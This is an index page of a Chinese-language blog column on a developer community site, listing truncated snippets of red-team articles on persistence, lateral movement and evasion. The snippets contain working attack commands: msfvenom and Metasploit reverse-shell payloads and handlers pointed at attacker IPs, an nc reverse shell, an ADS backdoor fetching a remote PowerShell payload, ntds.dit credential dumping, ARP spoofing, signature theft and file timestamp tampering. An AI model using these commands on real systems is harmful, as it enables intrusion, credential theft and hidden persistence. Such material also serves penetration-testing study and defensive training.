腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
首页
学习
活动
专区
工具
TVP
最新优惠活动
返回腾讯云官网
子云笔记
专栏成员
举报
35
文章
34302
阅读量
13
订阅数
订阅专栏
申请加入专栏
全部文章(35)
windows(4)
local(3)
ssh(2)
persistence(2)
registry(2)
服务(2)
linux(1)
shell(1)
powershell(1)
authentication(1)
boot(1)
cron(1)
invoke(1)
office(1)
tomcat7(1)
wmi(1)
进程(1)
搜索文章
搜索
搜索
关闭
office模板
office
VBA可以插入到基本模板中,并用于在相应的 Office 应用程序启动时执行代码以获得持久性默认情况下,Word 会创建一个Normal.dotm 模板,可以对其进行修改以包含恶意宏Word Normal.dotm location:C:\Users\<username>\AppData\Roaming\Microsoft\Templates\Normal.dotm%APPDATA%\Microsoft\Templates\ --> Normal.dotm分析Empire -- usestager/wind
浪子云
2022-11-24
838
0
windows粘贴劫持
windows
pastejacker粘贴劫持是恶意网站用来控制计算机剪贴板并将其内容更改为有害内容的方法该工具的主要目的是自动化(粘贴劫持/剪贴板中毒/无论您命名什么)攻击,将攻击中使用的所有已知技巧收集在一个地方和一个自动化作业中由于这种攻击取决于用户将粘贴的内容,因此我将Metasploit网络交付模块的想法实现到工具中,因此当用户粘贴到终端中时,您可以在他的设备上获得meterpreter会话图片图片
浪子云
2022-11-20
1.9K
0
.so注入
https://github.com/chokepoint/azazelapt-get install libpam0g-dev gcc make python libssl-dev libpcap-dev -yubuntu16-servermake && make installINSTALL=/libCFLAGS+= -WallLDFLAGS+= -lc -ldl -lpam -lutilall: config libselinux.soclient:$(CC) -fPIC client.c -shar
浪子云
2022-11-16
740
0
windows屏幕保护程序
windows
攻击者可以通过执行由用户不活动触发的恶意内容来建立持久性。屏幕保护程序是在用户不活动时间的可配置时间后执行的程序,由文件扩展名为 .scr 的可移植可执行 (PE) 文件组成。Windows屏幕保护程序应用程序scrnsave.scr位于64位Windows系统中,以及基本Windows安装中包含的屏幕保护程序。C:\Windows\System32\C:\Windows\sysWOW64\以下屏幕保护程序设置存储在注册表 () 中,可以对其进行操作以实现持久性:HKCU\Control Panel\Des
浪子云
2022-11-10
1.8K
0
linux系统服务-进程
linux
服务
进程
#service_persistenceuse exploit/multi/script/web_deliveryset target 7set payload linux/x64/meterpreter/reverse_tcpset lhost 192.168.85.161set lport 4949exploit -juse linux/local/service_persistenceset session 1set lport 9090set target 3exploit -jsystemd-c
浪子云
2022-11-09
2K
0
隐藏服务-sddl
服务
use exploit/multi/script/web_delivery use exploit/windows/local/persistence_servicecmd:sc query cqvsfnsc qc cqvsfnpowershell:get-service -name cqvsfnJoshua Wright提供的方法使用sc 命令的sdset模块可以修改服务的安全描述符:SDDL隐藏cmd:(隐藏服务)sc.exe sdset cqvsfn "D:(D;;DCLCWPDTSDCC;;;IU)
浪子云
2022-09-30
457
0
窃取分析PE签名
Stealing Signatures and Making One Invalid Signature at a Time.https://github.com/secretsquirrel/SigThief从二进制文件中获取签名并将其添加到另一个二进制文件python sigthief.py -i 360.exe -t cmd.exe -o 361.exehttps://blog.didierstevens.com/programs/authenticode-tools/分析PESig是一种检查PE文件
浪子云
2022-09-13
592
0
arp投毒
cat /proc/sys/net/ipv4/ip_forwardecho 1 >> /proc/sys/net/ipv4/ip_forwardcat /proc/sys/net/ipv4/ip_forwardarpspoof -i eth0 -t 192.168.63.148 -r 192.168.63.2arpspoof -i eth0 -t 192.168.63.2 -r 192.168.63.148python sniff-pcap.py -i 110.242.68.66 -c 100 -o 12
浪子云
2022-09-04
1.9K
0
ntdsutil+NTDSDumpEx
%SystemRoot%\ntds\ntdsutil snapshot "activate instance ntds" create quit quitntdsutil snapshot "mount {db105e51-d615-44bd-805b-20336cdd2a34}" quit quitcopy C:\$SNAP_202304251256_VOLUMEC$\Windows\NTDS\ntds.dit c:\temp\ntds.ditntdsutil snapshot "umount {db1
浪子云
2022-09-03
396
0
Invoke-ADSBackdoor
invoke
nishang set-executionpolicy remotesigned Import-Module .\Invoke-ADSBackdoor.ps1 Invoke-ADSBackdoor -PayloadURL http://172.18.13.120:8080/1.ps1 Invoke-ADSBackdoor脚本能在nfts数据流中留下一个永久性的后门 Invoke-ADSBackdoor脚本用于向ADS注入代码并以普通用户权限运行 备用数据流(ADS)是微软的一项功能,其目的是
浪子云
2022-08-24
469
0
windows文件时间戳修改
windows
创建时间修改$(Get-Item FILENAME.EXT).creationtime=$(Get-Date "12/24/2020 07:15 am")$(Get-Item .\mOaDU.exe).creationtime=$(Get-Date "12/24/2020 07:15 am")访问时间修改$(Get-Item .\mOaDU.exe).lastaccesstime=$(Get-Date "12/24/2011 07:15 am")修改时间修改$(Get-Item .\mOaDU.exe).l
浪子云
2022-08-18
4.9K
0
exploit/windows/local/cve_2022_21882_win32k
msf6 exploit(windows/local/cve_2022_21882_win32k) > sessionsActive sessions=============== Id Name Type Information Connection -- ---- ---- ----------- ----
浪子云
2022-08-17
446
0
exploit/windows/local/persistence_service
local
persistence
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.18.13.90 lport=9999 -f exe > 123.exeuse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 172.18.13.90set lport 9999exploit -jmsf6 exploit(multi/handler) > sessionsActive
浪子云
2022-07-22
572
0
内网安全-上传和下载
利用FTP协议上传文件sudo apt-get install vsftpd -ysudo mkdir /ftp && cd /ftp && mkdir uploadfilesudo chmod 777 -R /ftp/uploadfilevim /etc/vsftpd.conf anonymous_enable=YESanon_root=/ftp/uploadfileno_anon_password=YESwrite_enable=YESanon_upload_enable=YESanon_mkdir_w
浪子云
2022-07-18
428
0
cron
cron
msfvenom -p cmd/unix/reverse_bash LHOST=172.18.13.90 LPORT=9898 -f raw > shell.shuse exploit/multi/handlerset payload cmd/unix/reverse_netcatset lhost 172.18.13.90set lport 9797exploit -juse exploit/linux/local/cron_persistenceset target 2set payload cmd/
浪子云
2022-07-06
995
0
Boot or Logon Autostart Execution: Authentication Package
authentication
boot
Boot or Logon Autostart Execution: Authentication PackageHKLM\SYSTEM\CurrentControlSet\Control\Lsa\"Authentication Packages"=<target binary>SSP维持域控权限1.privilege::debugmisc::memsspC:\Windows\System32:mimilsa.log重启后失效2.注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentCon
浪子云
2022-06-29
273
0
反向shell
shell
apt-get -y install netcat-traditionalupdate-alternatives --config nc nc文件传输接受端:nc -lp 333 > 1.exe发送端:nc -vn 172.18.13.90 333 < 4.1.exe -q 1nc简易聊天A:nc -l -p 888B:nc -vn 172.18.13.90 888nc反向shell:目标机:nc 172.18.13.90 9999 -e /usr/bin/bash攻击机:nc -lvp 9999pytho
浪子云
2022-06-26
474
0
icmp-ptunnel
icmp-ptunnelwget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gzapt install -y byaccapt install -y flex ./configuremake && make install wget http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.72.tar.gzmake && make install vim /etc/ld.so.conf/usr/lo
浪子云
2022-06-25
479
0
empire-registry
registry
empire-registrypowershell-empire serverpowershell-empire clientuselistener httpset Name testset Port 8899executebacklistenersusestager windows/cmd_execset Listener testset OutFile shell33.batexecuteusemodule powershell/persistence/userland/registryset RegP
浪子云
2022-06-24
317
0
icmp-icmpsh
icmp-icmpshgit clone https://github.com/inquisb/icmpsh.gitpip2 install flask(需要这个才能离线安装python2的impacket)git clone https://github.com/SecureAuthCorp/impacket.gitpython2 setup.py install (python2离线安装impacket最后会报错无影响)修改run.sh的配置图片图片图片图片图片图片
浪子云
2022-06-23
634
0
点击加载更多
社区活动
【纪录片】中国数据库前世今生
穿越半个世纪,探寻中国数据库50年的发展历程
立即查看
Python精品学习库
代码在线跑,知识轻松学
立即查看
博客搬家 | 分享价值百万资源包
自行/邀约他人一键搬运博客,速成社区影响力并领取好礼
立即体验
技术创作特训营·精选知识专栏
往期视频·千货材料·成员作品 最新动态
立即查看
领券
问题归档
专栏文章
快讯文章归档
关键词归档
开发者手册归档
开发者手册 Section 归档